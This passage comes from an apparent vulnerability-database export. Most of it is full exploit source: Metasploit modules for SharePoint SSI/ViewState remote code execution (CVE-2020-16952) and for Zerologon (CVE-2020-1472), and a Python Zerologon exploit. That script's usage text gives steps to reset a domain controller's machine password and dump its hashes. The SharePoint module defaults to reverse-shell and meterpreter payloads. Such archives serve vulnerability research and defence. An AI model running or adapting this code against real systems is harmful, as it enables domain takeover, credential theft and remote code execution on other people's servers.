end\n\n if (@validation_key = datastore['VALIDATION_KEY'])\n print_status(\"Using ViewState validation key #{@validation_key}\")\n else\n create_ssi_page\n leak_web_config\n end\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def create_ssi_page\n print_status(\"Creating page for SSI: #{ssi_path}\")\n\n res = send_request_cgi(\n 'method' => 'PUT',\n 'uri' => ssi_path,\n 'cookie' => cookie,\n 'data' => ssi_page\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\")\n end\n\n unless [200, 201].include?(res.code)\n if res.code == 401\n fail_with(Failure::NoAccess, \"Failed to auth with creds #{username}:#{password}\")\n end\n\n fail_with(Failure::NotFound, 'Failed to create page')\n end\n\n print_good('Successfully created page')\n @page_created = true\n end\n\n def leak_web_config\n print_status('Leaking web.config')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => ssi_path,\n 'cookie' => cookie,\n 'headers' => {\n ssi_header => '<form runat=\"server\" /><!--#include virtual=\"/web.config\"-->'\n }\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\")\n end\n\n unless res.code == 200\n fail_with(Failure::NotFound, \"Failed to retrieve #{ssi_path}\")\n end\n\n unless (web_config = res.get_xml_document.at('//configuration'))\n fail_with(Failure::NotFound, 'Failed to extract web.config from response')\n end\n\n print_good(\"Saved web.config to #{store_loot('web.config', 'text/xml', rhost, web_config.to_xml, 'web.config', name)}\")\n\n unless (@validation_key = extract_viewstate_validation_key(web_config))\n fail_with(Failure::NotFound, 'Failed to extract ViewState validation key')\n end\n\n print_good(\"ViewState validation key: #{@validation_key}\")\n ensure\n delete_ssi_page if @page_created\n end\n\n def delete_ssi_page\n print_status(\"Deleting #{ssi_path}\")\n\n res = send_request_cgi(\n 'method' => 'DELETE',\n 'uri' => ssi_path,\n 'cookie' => cookie,\n 'partial' => true\n )\n\n unless res\n print_error(\"Target did not respond to #{__method__}\")\n return\n end\n\n unless res.code == 204\n print_warning('Failed to delete page')\n return\n end\n\n print_good('Successfully deleted page')\n end\n\n def execute_command(cmd, _opts = {})\n sharepoint_execute_command_via_viewstate(cmd, @validation_key, { 'cookie' => cookie })\n end\n\n def ssi_page\n <<~XML\n <%@ Register Tagprefix=\"WebPartPages\" Namespace=\"Microsoft.SharePoint.WebPartPages\" Assembly=\"Microsoft.SharePoint, Version=14.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c\" %>\n <WebPartPages:DataFormWebPart runat=\"server\">\n <ParameterBindings>\n <ParameterBinding Name=\"#{ssi_param}\" Location=\"ServerVariable(HTTP_#{ssi_header})\" DefaultValue=\"\" />\n </ParameterBindings>\n <xsl>\n <xsl:stylesheet xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\">\n <xsl:param name=\"#{ssi_param}\" />\n <xsl:template match=\"/\">\n <xsl:value-of select=\"$#{ssi_param}\" disable-output-escaping=\"yes\" />\n </xsl:template>\n </xsl:stylesheet>\n </xsl>\n </WebPartPages:DataFormWebPart>\n XML\n end\n\n def ssi_path\n @ssi_path ||= normalize_uri(target_uri.path, \"#{rand_text_alphanumeric(8..42)}.aspx\")\n end\n\n def ssi_header\n @ssi_header ||= rand_text_alphanumeric(8..42)\n end\n\n def ssi_param\n @ssi_param ||= rand_text_alphanumeric(8..42)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/sharepoint_ssi_viewstate.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-03T18:07:00", "description": "A vulnerability exists within the Netlogon authentication process where the security properties granted by AES are lost due to an implementation flaw related to the use of a static initialization vector (IV). An attacker can leverage this flaw to target an Active Directory Domain Controller and make repeated authentication attempts using NULL data fields which will succeed every 1 in 256 tries (~0.4%). This module leverages the vulnerability to reset the machine account password to an empty string, which will then allow the attacker to authenticate as the machine account. After exploitation, it's important to restore this password to it's original value. Failure to do so can result in service instability.\n", "cvss3": {}, "published": "2020-09-17T18:28:53", "type": "metasploit", "title": "Netlogon Weak Cryptographic Authentication", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2022-08-03T14:32:38", "id": "MSF:AUXILIARY-ADMIN-DCERPC-CVE_2020_1472_ZEROLOGON-", "href": "https://www.rapid7.com/db/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'windows_error'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Auxiliary::Report\n\n CheckCode = Exploit::CheckCode\n Netlogon = RubySMB::Dcerpc::Netlogon\n EMPTY_SHARED_SECRET = OpenSSL::Digest.digest('MD4', '')\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Netlogon Weak Cryptographic Authentication',\n 'Description' => %q{\n A vulnerability exists within the Netlogon authentication process where the security properties granted by AES\n are lost due to an implementation flaw related to the use of a static initialization vector (IV). An attacker\n can leverage this flaw to target an Active Directory Domain Controller and make repeated authentication attempts\n using NULL data fields which will succeed every 1 in 256 tries (~0.4%). This module leverages the vulnerability\n to reset the machine account password to an empty string, which will then allow the attacker to authenticate as\n the machine account. After exploitation, it's important to restore this password to it's original value. Failure\n to do so can result in service instability.\n },\n 'Author' => [\n 'Tom Tervoort', # original vulnerability details\n 'Spencer McIntyre', # metasploit module\n 'Dirk-jan Mollema' # password restoration technique\n ],\n 'Notes' => {\n 'AKA' => ['Zerologon'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [],\n 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]\n },\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'REMOVE', { 'Description' => 'Remove the machine account password' } ],\n [ 'RESTORE', { 'Description' => 'Restore the machine account password' } ]\n ],\n 'DefaultAction' => 'REMOVE',\n 'References' => [\n [ 'CVE', '2020-1472' ],\n [ 'URL', 'https://www.secura.com/blog/zero-logon' ],\n [ 'URL', 'https://github.com/SecuraBV/CVE-2020-1472/blob/master/zerologon_tester.py' ],\n [ 'URL', 'https://github.com/dirkjanm/CVE-2020-1472/blob/master/restorepassword.py' ]\n ]\n )\n )\n\n register_options(\n [\n OptPort.new('RPORT', [ false, 'The netlogon RPC port' ]),\n OptString.new('NBNAME', [ true, 'The server\\'s NetBIOS name' ]),\n OptString.new('PASSWORD', [ false, 'The password to restore for the machine account (in hex)' ], conditions: %w[ACTION == RESTORE]),\n ]\n )\n end\n\n def peer\n \"#{rhost}:#{@dport || datastore['RPORT']}\"\n end\n\n def bind_to_netlogon_service\n @dport = datastore['RPORT']\n if @dport.nil? || @dport == 0\n @dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], Netlogon::UUID, '1.0', 'ncacn_ip_tcp')\n fail_with(Failure::NotFound, 'Could not determine the RPC port used by the Microsoft Netlogon Server') unless @dport\n end\n\n # Bind to the service\n handle = dcerpc_handle(Netlogon::UUID, '1.0', 'ncacn_ip_tcp', [@dport])\n print_status(\"Binding to #{handle} ...\")\n dcerpc_bind(handle)\n print_status(\"Bound to #{handle} ...\")\n end\n\n def check\n bind_to_netlogon_service\n\n status = nil\n 2000.times do\n netr_server_req_challenge\n response = netr_server_authenticate3\n\n break if (status = response.error_status) == 0\n\n windows_error = ::WindowsError::NTStatus.find_by_retval(response.error_status.to_i).first\n # Try again if the Failure is STATUS_ACCESS_DENIED, otherwise something has gone wrong\n next if windows_error == ::WindowsError::NTStatus::STATUS_ACCESS_DENIED\n\n fail_with(Failure::UnexpectedReply, windows_error)\n end\n\n return CheckCode::Detected unless status == 0\n\n CheckCode::Vulnerable\n end\n\n def run\n case action.name\n when 'REMOVE'\n action_remove_password\n when 'RESTORE'\n action_restore_password\n end\n end\n\n def action_remove_password\n fail_with(Failure::Unknown, 'Failed to authenticate to the server by leveraging the vulnerability') unless check == CheckCode::Vulnerable\n\n print_good('Successfully authenticated')\n\n report_vuln(\n host: rhost,\n port: @dport,\n name: name,\n sname: 'dcerpc',\n proto: 'tcp',\n refs: references,\n info: \"Module #{fullname} successfully authenticated to the server without knowledge of the shared secret\"\n )\n\n response = netr_server_password_set2\n status = response.error_status.to_i\n fail_with(Failure::UnexpectedReply, \"Password change failed with NT status: 0x#{status.to_s(16)}\") unless status == 0\n\n print_good(\"Successfully set the machine account (#{datastore['NBNAME']}$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)\")\n end\n\n def action_restore_password\n fail_with(Failure::BadConfig, 'The RESTORE action requires the PASSWORD option to be set') if datastore['PASSWORD'].blank?\n fail_with(Failure::BadConfig, 'The PASSWORD option must be in hex') if /^([0-9a-fA-F]{2})+$/ !~ datastore['PASSWORD']\n password = [datastore['PASSWORD']].pack('H*')\n\n bind_to_netlogon_service\n client_challenge = OpenSSL::Random.random_bytes(8)\n\n response = netr_server_req_challenge(client_challenge: client_challenge)\n session_key = Netlogon.calculate_session_key(EMPTY_SHARED_SECRET, client_challenge, response.server_challenge)\n ppp = Netlogon.encrypt_credential(session_key, client_challenge)\n\n response = netr_server_authenticate3(client_credential: ppp)\n fail_with(Failure::NoAccess, 'Failed to authenticate (the machine account password may not be empty)') unless response.error_status == 0\n\n new_password_data = (\"\\x00\" * (512 - password.length)) + password + [password.length].pack('V')\n response = netr_server_password_set2(\n authenticator: Netlogon::NetlogonAuthenticator.new(\n credential: Netlogon.encrypt_credential(session_key, [ppp.unpack1('Q') + 10].pack('Q')),\n timestamp: 10\n ),\n clear_new_password: Netlogon.encrypt_credential(session_key, new_password_data)\n )\n status = response.error_status.to_i\n fail_with(Failure::UnexpectedReply, \"Password change failed with NT status: 0x#{status.to_s(16)}\") unless status == 0\n\n print_good(\"Successfully set machine account (#{datastore['NBNAME']}$) password\")\n end\n\n def netr_server_authenticate3(client_credential: \"\\x00\" * 8)\n nrpc_call('NetrServerAuthenticate3',\n primary_name: \"\\\\\\\\#{datastore['NBNAME']}\",\n account_name: \"#{datastore['NBNAME']}$\",\n secure_channel_type: :ServerSecureChannel,\n computer_name: datastore['NBNAME'],\n client_credential: client_credential,\n flags: 0x212fffff)\n end\n\n def netr_server_password_set2(authenticator: nil, clear_new_password: \"\\x00\" * 516)\n authenticator ||= Netlogon::NetlogonAuthenticator.new(credential: \"\\x00\" * 8, timestamp: 0)\n nrpc_call('NetrServerPasswordSet2',\n primary_name: \"\\\\\\\\#{datastore['NBNAME']}\",\n account_name: \"#{datastore['NBNAME']}$\",\n secure_channel_type: :ServerSecureChannel,\n computer_name: datastore['NBNAME'],\n authenticator: authenticator,\n clear_new_password: clear_new_password)\n end\n\n def netr_server_req_challenge(client_challenge: \"\\x00\" * 8)\n nrpc_call('NetrServerReqChallenge',\n primary_name: \"\\\\\\\\#{datastore['NBNAME']}\",\n computer_name: datastore['NBNAME'],\n client_challenge: client_challenge)\n end\n\n def nrpc_call(name, **kwargs)\n request = Netlogon.const_get(\"#{name}Request\").new(**kwargs)\n\n begin\n raw_response = dcerpc.call(request.opnum, request.to_binary_s)\n rescue Rex::Proto::DCERPC::Exceptions::Fault\n fail_with(Failure::UnexpectedReply, \"The #{name} Netlogon RPC request failed\")\n end\n\n Netlogon.const_get(\"#{name}Response\").read(raw_response)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2021-12-25T19:19:59", "description": "This Metasploit module exploits a server-side include (SSI) in SharePoint to leak the web.config file and forge a malicious ViewState with the extracted validation key. This exploit is authenticated and requires a user with page creation privileges, which is a standard permission in SharePoint. The web.config file will be stored in loot once retrieved, and the VALIDATION_KEY option can be set to short-circuit the SSI and trigger the ViewState deserialization.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-19T00:00:00", "type": "zdt", "title": "Microsoft SharePoint SSI / ViewState Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16952"], "modified": "2020-10-19T00:00:00", "id": "1337DAY-ID-35071", "href": "https://0day.today/exploit/description/35071", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::ViewState\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft SharePoint Server-Side Include and ViewState RCE',\n 'Description' => %q{\n This module exploits a server-side include (SSI) in SharePoint to leak\n the web.config file and forge a malicious ViewState with the extracted\n validation key.\n\n This exploit is authenticated and requires a user with page creation\n privileges, which is a standard permission in SharePoint.\n\n The web.config file will be stored in loot once retrieved, and the\n VALIDATION_KEY option can be set to short-circuit the SSI and trigger\n the ViewState deserialization.\n\n Tested against SharePoint 2019 on Windows Server 2016.\n },\n 'Author' => [\n 'mr_me', # Discovery and exploit\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-16952'],\n ['URL', 'https://srcincite.io/advisories/src-2020-0022/'],\n ['URL', 'https://srcincite.io/pocs/cve-2020-16952.py.txt'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952']\n ],\n 'DisclosureDate' => '2020-10-13', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Windows Command',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n ],\n [\n 'Windows Dropper',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs],\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,\n 'PAYLOAD' => 'windows/x64/meterpreter_reverse_https'\n }\n ],\n [\n 'PowerShell Stager',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'DotNetGadgetChain' => :TypeConfuseDelegate\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [UNRELIABLE_SESSION], # SSI may fail the second time\n 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('VALIDATION_KEY', [false, 'ViewState validation key']),\n # \"Promote\" these advanced options so we don't have to pass around our own\n OptString.new('HttpUsername', [false, 'SharePoint username']),\n OptString.new('HttpPassword', [false, 'SharePoint password'])\n ])\n end\n\n def post_auth?\n true\n end\n\n def username\n datastore['HttpUsername']\n end\n\n def password\n datastore['HttpPassword']\n end\n\n def vuln_builds\n [\n [Gem::Version.new('15.0.0.4571'), Gem::Version.new('15.0.0.5275')], # SharePoint 2013\n [Gem::Version.new('16.0.0.4351'), Gem::Version.new('16.0.0.5056')], # SharePoint 2016\n [Gem::Version.new('16.0.0.10337'), Gem::Version.new('16.0.0.10366')] # SharePoint 2019\n ]\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path)\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n # Hat tip @tsellers-r7\n #\n # MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly\n unless (build_header = res.headers['MicrosoftSharePointTeamServices'])\n return CheckCode::Unknown('Target does not appear to be running SharePoint.')\n end\n\n unless (build = build_header.scan(/^([\\d.]+):/).flatten.first)\n return CheckCode::Detected('Target did not respond with SharePoint build.')\n end\n\n if vuln_builds.any? { |build_range| Gem::Version.new(build).between?(*build_range) }\n return CheckCode::Appears(\"SharePoint #{build} is a vulnerable build.\")\n end\n\n CheckCode::Safe(\"SharePoint #{build} is not a vulnerable build.\")\n end\n\n def exploit\n unless username && password\n fail_with(Failure::BadConfig, 'HttpUsername and HttpPassword are required for exploitation')\n end\n\n if (@validation_key = datastore['VALIDATION_KEY'])\n print_status(\"Using ViewState validation key #{@validation_key}\")\n else\n create_ssi_page\n leak_web_config\n end\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def create_ssi_page\n print_status(\"Creating page for SSI: #{ssi_path}\")\n\n res = send_request_cgi(\n 'method' => 'PUT',\n 'uri' => ssi_path,\n 'data' => ssi_page\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\")\n end\n\n unless [200, 201].include?(res.code)\n if res.code == 401\n fail_with(Failure::NoAccess, \"Failed to auth with creds #{username}:#{password}\")\n end\n\n fail_with(Failure::NotFound, 'Failed to create page')\n end\n\n print_good('Successfully created page')\n @page_created = true\n end\n\n def leak_web_config\n print_status('Leaking web.config')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => ssi_path,\n 'headers' => {\n ssi_header => '<form runat=\"server\" /><!--#include virtual=\"/web.config\"-->'\n }\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\")\n end\n\n unless res.code == 200\n fail_with(Failure::NotFound, \"Failed to retrieve #{ssi_path}\")\n end\n\n unless (web_config = res.get_xml_document.at('//configuration'))\n fail_with(Failure::NotFound, 'Failed to extract web.config from response')\n end\n\n print_good(\"Saved web.config to: #{store_loot('web.config', 'text/xml', rhost, web_config.to_xml, 'web.config', name)}\")\n\n unless (@validation_key = extract_viewstate_validation_key(web_config))\n fail_with(Failure::NotFound, 'Failed to extract ViewState validation key')\n end\n\n print_good(\"ViewState validation key: #{@validation_key}\")\n ensure\n delete_ssi_page if @page_created\n end\n\n def delete_ssi_page\n print_status(\"Deleting #{ssi_path}\")\n\n res = send_request_cgi(\n 'method' => 'DELETE',\n 'uri' => ssi_path,\n 'partial' => true\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\")\n end\n\n unless res.code == 204\n print_warning('Failed to delete page')\n return\n end\n\n print_good('Successfully deleted page')\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'),\n 'vars_post' => {\n '__VIEWSTATE' => generate_viewstate_payload(\n cmd,\n extra: pack_viewstate_generator('63E6434F'), # /_layouts/15/zoombldr.aspx\n algo: 'sha256',\n key: pack_viewstate_validation_key(@validation_key)\n )\n }\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\")\n end\n\n unless res.code == 200\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good('Successfully executed command')\n end\n\n def ssi_page\n <<~XML\n <WebPartPages:DataFormWebPart runat=\"server\">\n <ParameterBindings>\n <ParameterBinding Name=\"#{ssi_param}\" Location=\"ServerVariable(HTTP_#{ssi_header})\" DefaultValue=\"\" />\n </ParameterBindings>\n <xsl>\n <xsl:stylesheet xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\">\n <xsl:param name=\"#{ssi_param}\" />\n <xsl:template match=\"/\">\n <xsl:value-of select=\"$#{ssi_param}\" disable-output-escaping=\"yes\" />\n </xsl:template>\n </xsl:stylesheet>\n </xsl>\n </WebPartPages:DataFormWebPart>\n XML\n end\n\n def ssi_path\n @ssi_path ||= normalize_uri(target_uri.path, \"#{rand_text_alphanumeric(8..42)}.aspx\")\n end\n\n def ssi_header\n @ssi_header ||= rand_text_alphanumeric(8..42)\n end\n\n def ssi_param\n @ssi_param ||= rand_text_alphanumeric(8..42)\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/35071", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-01T00:00:00", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-18T00:00:00", "type": "zdt", "title": "ZeroLogon - Netlogon Elevation of Privilege Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-18T00:00:00", "id": "1337DAY-ID-35274", "href": "https://0day.today/exploit/description/35274", "sourceData": "# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege\n# Date: 2020-10-04\n# Exploit Author: West Shepherd\n# Vendor Homepage: https://www.microsoft.com\n# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2\n# Tested on: Microsoft Windows Server 2016 Standard x64\n# CVE : CVE-2020-1472\n# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code\n# Sources: https://www.secura.com/pathtoimg.php?id=2055\n# Requirements: python3 and impacket 0.9.21+ (tested using this version)\n#!/usr/bin/env python3\nimport hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs\nfrom binascii import hexlify, unhexlify\nfrom subprocess import check_call\nfrom impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED\nfrom impacket.dcerpc.v5 import nrpc, epm, transport\nfrom impacket import crypto, version\nfrom impacket.examples import logger\nfrom Cryptodome.Cipher import AES\nfrom struct import pack, unpack\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\n\n\nclass Exploit:\n def __init__(\n self,\n name='',\n address='',\n attempts=2000,\n password=''\n ):\n name = name.rstrip('$')\n self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\\\n .ServerSecureChannel\n self.authenticator = self.getAuthenticator(stamp=0)\n self.clearNewPasswordBlob = b'\\x00' * 516\n self.primaryName = ('\\\\\\\\%s' % name) + '\\x00'\n self.accountName = ('%s$' % name) + '\\x00'\n self.computerName = name + '\\x00'\n self.clientCredential = b'\\x00' * 8\n self.clientChallenge = b'\\x00' * 8\n self.negotiateFlags = 0x212fffff\n self.address = address\n self.max = attempts\n self.dce = None\n self.sessionKey = None\n self.clientStoredCredential = None\n self.password = password\n\n def encodePassword(self, password):\n if isinstance(password, str):\n password = password.encode('utf-8')\n return b'\\x00' * (512 - len(password))\\\n + password \\\n + pack('<L', len(password))\n\n def getAuthenticator(self, creds=b'\\x00' * 8, stamp=10):\n authenticator = nrpc.NETLOGON_AUTHENTICATOR()\n authenticator['Credential'] = creds\n authenticator['Timestamp'] = stamp\n return authenticator\n\n def serverReqChallenge(self):\n try:\n binding = epm.hept_map(\n self.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp'\n )\n self.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc()\n self.dce.connect()\n self.dce.bind(nrpc.MSRPC_UUID_NRPC)\n return nrpc.hNetrServerReqChallenge(\n self.dce,\n self.primaryName,\n self.computerName,\n self.clientChallenge\n )\n except BaseException as ex:\n self.logError(ex)\n\n def serverAuthenticate(self):\n try:\n auth = nrpc.hNetrServerAuthenticate3(\n self.dce,\n self.primaryName,\n self.accountName,\n self.secureChannelType,\n self.computerName,\n self.clientCredential,\n self.negotiateFlags\n )\n assert auth['ErrorCode'] == 0\n self.logInfo('successfully authenticated')\n return True\n except nrpc.DCERPCSessionError as ex:\n self.dce = None\n if ex.get_error_code() == 0xc0000022:\n return None\n else:\n self.logFail(ex.get_error_code())\n except BaseException as ex:\n self.dce = None\n self.logFail(ex)\n self.dce = None\n\n def serverPasswordSet(self):\n try:\n return nrpc.hNetrServerPasswordSet2(\n self.dce,\n self.primaryName,\n self.accountName,\n self.secureChannelType,\n self.computerName,\n self.authenticator,\n self.clearNewPasswordBlob\n )\n except BaseException as ex:\n self.logError(ex)\n\n def authenticate(self):\n self.logInfo(\n 'checking target, attempting to authenticate %d max\nattempts' % self.max\n )\n for attempt in range(0, self.max):\n self.logInfo('attempt %d' % attempt)\n self.serverReqChallenge()\n self.serverAuthenticate()\n if self.dce is not None:\n break\n if self.dce:\n return True\n else:\n self.logError('failed to authenticate')\n\n def exploit(self):\n self.logInfo('attempting password reset')\n reset = self.serverPasswordSet()\n if reset['ErrorCode'] == 0:\n self.logInfo('successfully reset password')\n else:\n self.logError('failed to reset password')\n return self\n\n def ComputeNetlogonCredentialAES(self, challenge):\n return nrpc.ComputeNetlogonCredentialAES(\n challenge,\n self.sessionKey\n )\n\n def logInfo(self, message):\n sys.stdout.write(\"[+] %s\\n\" % str(message))\n return self\n\n def logError(self, message):\n sys.stderr.write(\"[-] error %s\\n\" % str(message))\n\n def logFail(self, message):\n sys.stderr.write(\"[!] failure %s\\n\" % str(message))\n sys.exit(2)\n\n def restore(self):\n self.logInfo('attempting to restore password')\n self.clientChallenge = b'12345678'\n try:\n self.primaryName = NULL\n challenge = self.serverReqChallenge()\n self.sessionKey = nrpc.ComputeSessionKeyAES(\n '', self.clientChallenge, challenge['ServerChallenge']\n )\n self.clientCredential = self.ComputeNetlogonCredentialAES(\n self.clientChallenge\n )\n try:\n self.serverAuthenticate()\n except Exception as e:\n if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0:\n raise\n self.logInfo('restoring password')\n self.clientStoredCredential = pack('<Q', unpack('<Q',\nself.clientCredential)[0] + 10)\n self.authenticator = self.getAuthenticator(\n\ncreds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential)\n )\n self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES(\n self.encodePassword(self.password)\n )\n reset = self.serverPasswordSet()\n if reset['ErrorCode'] == 0:\n self.logInfo('successfully restored password')\n else:\n self.logError('failed to restore password')\n except Exception as ex:\n self.logError(ex)\n return self\n\n\nif __name__ == '__main__':\n info = \"\"\"\nNOTE - Exploitation will break the DC until restored, recommended guidelines:\n\n 1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN:\n cve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP>\n\n 2. Exploit the DC - this will break the DC until restored:\n cve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP>\n\n 3. Dump the DC - for the DA hashes, this will not contain the\nmachine hex-pass:\n secretsdump.py -just-dc -no-pass <NETBIOS NAME>\\[email\u00a0protected]<IP>\n\n 4. Dump the DC again - use the DA hash to get the machines hex-pass:\n secretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP>\n\n 5. Restore target - this fixes the DC:\n cve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP>\n-hex <HEXPASS>\n\"\"\"\n parser = argparse.ArgumentParser(\n description='CVE-2020-1472 ZeroLogon Exploit - Netlogon\nElevation of Privilege',\n add_help=True\n )\n try:\n parser.add_argument('-do', default='check', action='store',\n help='What 